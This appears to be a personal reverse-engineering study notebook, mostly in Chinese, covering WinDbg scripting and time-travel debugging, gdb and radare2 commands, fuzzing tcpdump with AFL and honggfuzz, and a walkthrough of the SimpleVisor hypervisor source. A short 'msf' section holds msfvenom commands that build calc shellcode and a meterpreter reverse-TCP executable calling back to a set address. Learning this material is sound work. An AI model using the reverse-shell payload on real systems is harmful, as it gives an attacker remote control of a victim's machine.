| Dereference memory | host.evaluateExpression('(int*)0xADDRESS').dereference() | |
| Get access to the Pseudo-Registers | host.namespace.Debugger.State.PseudoRegisters | var entrypoint = host.namespace.Debugger.State.PseudoRegisters.General.exentry.address; |
| Execute WinDbg command | host.namespace.Debugger.Utility.Control.ExecuteCommand | var modules=host.namespace.Debugger.Utility.Control.ExecuteCommand("lm"); |
| Set Breakpoint | host.namespace.Debugger.Utility.Control.SetBreakpointAtSourceLocation<br>host.namespace.Debugger.Utility.Control.SetBreakpointAtOffset<br>host.namespace.Debugger.Utility.Control.SetBreakpointForReadWrite | |
| Iterate through LIST_ENTRYs | host.namespace.Debugger.Utility.Collections.FromListEntry() | var process_iterator = host.namespace.Debugger.Utility.Collections.FromListEntry( pAddrOfPsActiveProcessHead, "nt!_EPROCESS", "ActiveProcessLinks") |
Dealing with host.Int64
| Action | Command | Examples |
|---|---|---|
| Create/Convert an Int64 object | host.parseInt64('value')<br>host.parseInt64('value', 16 ) | host.parseInt64('42');<br>host.parseInt64('0x1337', 16); |
| Add / Subtract | [Int64Obj].add($int)<br>[Int64Obj].subtract($int) | var NextPage = BasePage.add(0x1000);<br>var NextPage = BasePage.subtract(0x1000); |
| Multiply / Divide | [Int64Obj].multiply($int)<br>[Int64Obj].divide($int) | |
| Compare | [Int64Obj1].compareTo([Int64Obj2]) | BasicBlock.StartAddress.compareTo(Address1) <= 0 |
| Bitwise operation | and: [Int64Obj].bitwiseAnd($int)<br>or: [Int64Obj].bitwiseOr($int)<br>xor: [Int64Obj].bitwiseXor($int)<br>lsh: [Int64Obj].bitwiseShiftLeft($shift)<br>rsh: [Int64Obj].bitwiseShiftRight($shift) | var PageBase = Address.bitwiseAnd(0xfffff000);<br>Address.bitwiseShiftLeft(12).bitwiseShiftRight(12); |
| Convert Int64 to native number | - with exception if precision loss: [Int64Obj].asNumber()<br>- no exception if precision loss: [Int64Obj].convertToNumber() | |
WinDbg gallery skeleton
Only 3 files are needed (see [5] for more details):
config.xml
<?xml version="1.0" encoding="UTF-8"?>
<Settings Version="1">
<Namespace Name="Extensions">
<Setting Name="ExtensionRepository" Type="VT_BSTR" Value="Implicit"></Setting>
<Namespace Name="ExtensionRepositories">
<Namespace Name="My Awesome Gallery">
<Setting Name="Id" Type="VT_BSTR" Value="any-guid-will-do"></Setting>
<Setting Name="LocalCacheRootFolder" Type="VT_BSTR" Value="\absolute\path\to\the\xmlmanifest\directory"></Setting>
<Setting Name="IsEnabled" Type="VT_BOOL" Value="true"></Setting>
</Namespace>
</Namespace>
</Namespace>
</Settings>
ManifestVersion.txt
1
1.0.0.0
1
Manifest.X.xml (where X is the version number, let's just use 1 so it is Manifest.1.xml)
<?xml version="1.0" encoding="utf-8"?>
<ExtensionPackages Version="1.0.0.0" Compression="none">
<ExtensionPackage>
<Name>Script1</Name>
<Version>1.0.0.0</Version>
<Description>Description of Script1.</Description>
<Components>
<ScriptComponent Name="Script1" Type="Engine" File=".\relative\path\to\Script1.js" FilePathKind="RepositoryRelative">
<FunctionAliases>
<FunctionAlias Name="AliasCreatedByScript`">
<AliasItem>
<Syntax><![CDATA[!AliasCreatedByScript]]></Syntax>
<Description><![CDATA[Quick description of AliasCreatedByScript.]]></Description>
</AliasItem>
</FunctionAlias>
</FunctionAliases>
</ScriptComponent>
</Components>
</ExtensionPackage>
</ExtensionPackages>
Then in WinDbg load & save:
0:000> .settings load \path\to\config.xml
0:000> .settings save
Time-Travel Debugging
| Action | Command | Examples |
|---|---|---|
| DDM Objects | @$curprocess.TTD<br>@$cursession.TTD | dx @$curprocess.TTD.Threads.First().Lifetime<br>dx @$cursession.TTD.Calls("ntdll!Nt*File").Count() |
| Run execution back | g- | |
| Reverse Step Over | p- | |
| Reverse Step Into | t- | |
| Regenerate the index | !ttdext.index | |
| Jump to position XX:YY (WinDbg) | !tt XX:YY | !tt 1B:0 |
| Jump to position XX:YY (DDM) | <TtdPosition>.SeekTo() | dx @$curprocess.TTD.Lifetime.MinPosition.SeekTo() |
Additional resources
- WinDbg .printf formatters
- JavaScript Debugger Scripting
- WinDbg Pseudo-Register Syntax
- WinDbg Playlist on YouTube
- WinDbg Extension Gallery
- SOS commands for .NET debugging
调用规约
-
Linux x64:
- TLDR: rdi, rsi, rdx, rcx, r8, r9
- User-level applications use as integer registers for passing the sequence %rdi, %rsi, %rdx, %rcx, %r8 and %r9. The kernel interface uses %rdi, %rsi, %rdx, %r10, %r8 and %r9. link
-
Windows x64:
- rcx, rdx, r8, r9, then stack
- https://docs.microsoft.com/zh-cn/cpp/build/x64-calling-convention?view=vs-2019
func1(int a, int b, int c, int d, int e, int f);
// a in RCX, b in RDX, c in R8, d in R9, f then e pushed on stack
- Windows x86:
- esp+4, esp+8
r2 (radare2)
- aaaa 分析
- afl 列出函数
- afl~main 列出包含 main 的函数
- s main 切换(seek)当前地址为 main
- pdf 打印当前的汇编
- 任意命令加 ? 提供 help 信息,比如 pd?
gdb
- r 运行,run
- c 继续,continue
- info reg 查看寄存器
- br *main 在main函数下断点
- br src/ss.c:123 在文件 ss.c:123 处下断点
- del 1 删除断点1
- disable 1 禁用断点1
- enable 1 启用断点1
- info br 查看断点
- x/4gx 0xdeadbeef 检查内存
- x/4wx 控制每行的列数
- x/2wx $rax
- x/10i $pc 打印当前汇编
- x/10i $rip rip/eip/pc都可以
- x/-10i $rip 可以倒着来
- n(next) 源码级别step over
- s(step) 源码级别step in
- si(stepi) 汇编级别step in
- ni(nexti) 汇编级别step over
- starti 开始时断下(找不到入口/entry时)
windbg
- sxe ld:xx.dll dll加载时断下
- * blabla 注释
- u $exentry 查看入口/entry
- x ntdll!D* 查看符号
- p step over
- t (trace) step into
windbg basic
- g 运行
- r 查看所有寄存器
- r rax 查看 rax
- u 查看当前eip的反汇编
- 直接按回车执行上一条命令
- 分号做分割,可以在一行执行多条命令
- ctrl + break 强制停止命令
windbg中有一些伪寄存器,最常见的就是memory界面默认显示的 @$scopeip,表示当前 eip
有如下这些常用伪寄存器,完整列表见官网
| pseudo register | desc |
|---|---|
| $exentry | 入口点 |
| $proc | 进程结构(EPROCESS)指针 |
| $peb | 进程PEB(process environment block)结构 |
| $teb | 线程TEB(thread environment block)结构 |
执行
p 命令:
[~Thread] p[r] [= StartAddress] [Count] ["Command"]
- 加 r 禁止寄存器显示
- 默认从 eip 开始执行,加 = StartAddress 从该地址开始执行
- 加 Count 表示执行的行数或者指令数(?如何区分),默认是 1
  - 切换汇编模式: l-t
  - 切换源码模式: l+t(更多:l+,l-指令文档)
- 加 "Command" 表示指令数执行完后需要执行的命令
t命令和p命令类似,区别是:t是step in,p是step over
- pa|ta [r] [=StartAddress] StopAddress 执行到指定地址
- pc|tc [r] [=StartAddress] [Count] 执行到下一个函数调用
- tb [r] [=StartAddress] [Count] 执行到下一个分支
断点
bp[ID] [Options] [Address [Passes]] ["Command String"]
bu[ID] [Options] [Address [Passes]] ["Command String"]
bm[Options] SymbolPattern [Passes] ["Command String"]
; 硬件断点
ba [ID] Access Size [Option] [Address[Passes]] ["Command String"]
- bp 软件断点
- ba 硬件断点
  - ba r1 0x401000 读0x401000 >= 1bytes
- bu 未加载模块断点
- bm 符号特征断点 (Set Symbol Breakpoint)
  - bm msvcr80d!print*
- bl 列举断点
- bc 清除断点
- bd/be 禁用/启用断点
TODO: 条件断点
栈回溯
more to learn
- https://medium.com/@yardenshafir2/windbg-the-fun-way-part-1-2e4978791f9b new way
- https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/07/27/debugging_malwarewi-hk5u.html log
- https://github.com/hugsy/defcon_27_windbg_workshop/blob/master/windbg_cheatsheet.md must memorize
- https://bbs.pediy.com/thread-250670.htm
msf
shellcode
msfvenom -p windows/x64/exec CMD=calc.exe -a x64 --platform win -f raw -o calc64.raw
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.11 LPORT=1111 -f exe > shell.exe
# 常用payload
payload/windows/x64/meterpreter_bind_tcp
winafl
honggfuzz
google开源的fuzz,多进程多线程
git clone https://github.com/google/honggfuzz
sudo apt install binutils-dev libunwind-dev
make
sudo make install
hfuzz-gcc
hfuzz-gcc imgRead.c -o imgRead
- honggfuzz 主fuzz程序
Examples:
Run the binary over a mutated file chosen from the directory. Disable fuzzing feedback (static mode):
honggfuzz -i input_dir -x -- /usr/bin/djpeg ___FILE___ # -x 没有插桩、反馈
As above, provide input over STDIN:
honggfuzz -i input_dir -x -s -- /usr/bin/djpeg
Use compile-time instrumentation (-fsanitize-coverage=trace-pc-guard,...):
honggfuzz -i input_dir -- /usr/bin/djpeg ___FILE___ # 有插桩,需要前提是用hfuzz-gcc编译过的?
Use persistent mode w/o instrumentation:
honggfuzz -i input_dir -P -x -- /usr/bin/djpeg_persistent_mode # -P persistent fuzzing?? 什么意思
Use persistent mode and compile-time (-fsanitize-coverage=trace-pc-guard,...) instrumentation:
honggfuzz -i input_dir -P -- /usr/bin/djpeg_persistent_mode
honggfuzz -i input/ -- ./imgRead ___FILE___
- persistent fuzz 文档 对单个api进行fuzz,有两种方式:
  - 定义 int LLVMFuzzerTestOneInput(uint8_t *buf, size_t len) 函数,在这里面调用api
  - 在程序中获取输入(比如循环读用户输入)的地方用 HF_ITER(&buf, &len); 来获取fuzzer喂来的数据
这种模式集中了fuzz的火力,速度当然非常快。
afl fuzz tcpdump
git clone https://github.com/the-tcpdump-group/tcpdump
cd tcpdump
./configure # failed
# install libpcap
git clone https://github.com/the-tcpdump-group/libpcap
sudo apt install flex bison -y
cd libpcap && ./configure
# 这里为什么要给两次fsanitize,值还不一样???
CC=afl-clang CFLAGS="-g -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer" ./configure
make
sudo make install
# finish install libpcap
cd ..
CC=afl-clang CFLAGS="-g -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer" LDFLAGS="-g -fsanitize=address -fsanitize=undefined -fno-omit-frame-pointer" ./configure
make
sudo make install
tcpdump 能处理 .pcap 文件,这是fuzz的点;很容易只想到它能抓包而束手无策
精简corpus,tests文件夹下往往有样本可用
afl-cmin -i tests/ -o testsmin -m none -- ./tcpdump -vv -ee -nnr @@
开搞
afl-fuzz -i testsmin/ -o tcpdumpfuzz -m none -- ./tcpdump -vv -ee -nnr @@
如果用honggfuzz
https://youtu.be/9jqg7T3Ltn4
-
编译阶段 CC=hfuzz 。。。
-
~精简~, 不精简还是hgfuzz自带??
honggfuzz -i tests -- ./tcpdump -vv -ee -nnr ___FILE___
vt
links
related repos:
- SimpleVisor VT-x hypervisor works on Windows and UEFI by ionescu007, “中心节点”之一,
- HyperPlatform VM-exit filtering platform ;“中心节点” 之一
- kHypervisor capable for nested virtualization in Windows x64 platform, 基于 HyperPlatform;
- HypervisorKeylogger korean; 单文件vt、在xp上测试成功;
- HackSysExtremeVulnerableDriver Vulnerable Driver; 提供编译好的sys, .sln编译有问题
- gbhv 专注于 EPT hooking; README值得看; #checkme
- chocolate_milk: Pure Rust x86_64 bootloader and kernel 常看常新
- barbervisor for fuzz
- HyperDbg for debug | 貌似和 hypervisor-from-scratch 系列文章有关
- VT_Learn VT技术入门; 在xp上测试成功
tutorials:
-
hypervisor development series:
- https://revers.engineering/day-0-virtual-environment-setup-scripts-and-windbg/
- https://revers.engineering/day-1-introduction-to-virtualization/
- https://revers.engineering/day-2-entering-vmx-operation/
- https://revers.engineering/day-3-multiprocessor-initialization-error-handling-the-vmcs/
- https://revers.engineering/day-4-vmcs-segmentation-ops
- https://revers.engineering/day-5-vmexits-interrupts-cpuid-emulation/
-
hypervisor from scratch series:
- Part 1: Basic Concepts & Configure Testing Environment
- Part 2: Entering VMX Operation
- Part 3: Setting up Our First Virtual Machine
- Part 4: Address Translation Using Extended Page Table (EPT)
- Part 5: Setting up VMCS & Running Guest Code
- Part 6: Virtualizing An Already Running System
- Part 7: Using EPT & Page-Level Monitoring Features
- Part 8: How To Do Magic With Hypervisor!
Source Code Read: SimpleVisor Pinback: vt
从驱动入口 DriverEntry 开始读:
首先做了一个 power state callback,之后加载 hypervisor
hypervisor 加载的逻辑在函数 ShvLoad 中,剩下的阅读都从这个函数出发。
首先需要让所有的 LP(Logical Processor) 进入 VMX root 模式
ShvLoad
ShvOsRunCallbackOnProcessors(ShvVpLoadCallback, &callbackContext);
KeGenericCallDpc // callback
ShvOsDpcRoutine // callback
ShvVpLoadCallback // 在这个函数中cpu 被 hyperjacked,~返回后就是unload和清理了~
// do cleanup:
// ShvVmxCleanup, KeSignalCallDpcSynchronize, KeSignalCallDpcDone
ShvVpLoadCallback
ShvVmxProbe // 检查 VMX root mode 是否支持
PSHV_VP_DATA vpData // 初始化vpData,代表一个~LP~的数据结构
vpData->SystemDirectoryTableBase = Context->Cr3; // TODO: 看注释,什么是PML4
ShvVpInitialize(vpData) // 初始化VP
if (ShvIsOurHypervisorPresent() == FALSE) // 通过cpuid检查当前hypervisor是否初始化成功
// ~此时cpuid应该已经被hook~
InterlockedIncrement(Context->InitCount); // 增加初始化成功的LP计数, This CPU is hyperjacked!
ShvVpInitialize(Data)
ShvOsPrepareProcessor // dummy(空实现),只在uefi时有用
ShvCaptureSpecialRegisters(&Data->SpecialRegisters); // 初始化vpData的SpecialRegisters:
// cr0, cr3, cr4, debug_ctl, msr_gs_base,
// kernel_dr7, gdtr.limit, idtr.limit, tr, ldtr
ShvOsCaptureContext(&Data->ContextFrame);
RtlCaptureContext(ContextRecord); // windows提供的函数:
// Retrieves a context record in the context of the caller.
status = ShvVmxLaunchOnVp(Data); // 如果EFLAGS_ALIGN_CHECK没有set,为当前处理器初始化VMX
ShvVmxLaunchOnVp(VpData)
VpData->MsrData[i].QuadPart = readmsr(MSR_IA32_VMX_BASIC + i); // 初始化VMX相关的一系列MSRs
ShvVmxMtrrInitialize(VpData); // 初始化 MTRR (Memory Type Range Registers) 相关的一系列MSRs,
// 这似乎是为了EPT准备的。
ShvVmxEptInitialize // 初始化 EPT structures
ShvVmxEnterRootModeOnVp(VpData) // Attempt to enter VMX root mode on this processor.
ShvVmxSetupVmcsForVp(VpData); // 初始化 VMCS,包括guest和host state,大多数“可选监控项”都在这里面
ShvVmxLaunch()
vmlaunch // 这里不该返回了,返回就是失败了,后面是失败处理
// 如果成功rip会指向 ShvVpRestoreAfterLaunch
failureCode = (INT32)ShvVmxRead(VM_INSTRUCTION_ERROR);
vmoff
ShvVmxEnterRootModeOnVp(VpData)
// - 做一些 check
// - 写 revision ID到VmxOn和vmcs里面
// - 设置一些physical addresses
// - 奇怪的掩码方式设置CR0和cr4
__vmx_on // Enable VMX Root Mode
__vmx_vmclear // Clear the state of the VMCS, setting it to Inactive
__vmx_vmptrld // Load the VMCS, setting its state to Active
// 至此 VMX Root Mode is enabled, with an active VMCS.
==== 重要的数据结构 ====
typedef struct _SHV_VP_DATA
{
union
{
DECLSPEC_ALIGN(PAGE_SIZE) UINT8 ShvStackLimit[KERNEL_STACK_SIZE];
struct
{
SHV_SPECIAL_REGISTERS SpecialRegisters;
CONTEXT ContextFrame;
UINT64 SystemDirectoryTableBase;
LARGE_INTEGER MsrData[17];
SHV_MTRR_RANGE MtrrData[16];
UINT64 VmxOnPhysicalAddress;
UINT64 VmcsPhysicalAddress;
UINT64 MsrBitmapPhysicalAddress;
UINT64 EptPml4PhysicalAddress;
UINT32 EptControls;
};
};
DECLSPEC_ALIGN(PAGE_SIZE) UINT8 MsrBitmap[PAGE_SIZE];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_EPML4E Epml4[PML4E_ENTRY_COUNT];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_PDPTE Epdpt[PDPTE_ENTRY_COUNT];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_LARGE_PDE Epde[PDPTE_ENTRY_COUNT][PDE_ENTRY_COUNT];
DECLSPEC_ALIGN(PAGE_SIZE) VMX_VMCS VmxOn;
DECLSPEC_ALIGN(PAGE_SIZE) VMX_VMCS Vmcs;
} SHV_VP_DATA, *PSHV_VP_DATA;
Ask me something about vt Pinback: vt
为什么说vt运行在ring -1层?
宿主机是win10,虚拟机是win7,在vm里面安装vt驱动,画出整个架构图。
嵌套虚拟化是什么意思?
vt是如何hook cpuid的?
vt除了hook指令还可以做什么其他的事情,比如hook用户层/内核函数?
为什么vt的载体是一个驱动?
power callback 是干什么的,为什么要在hypervisor的DriverEntry里面初始化它,SimpleVisor和HyperPlatform都有?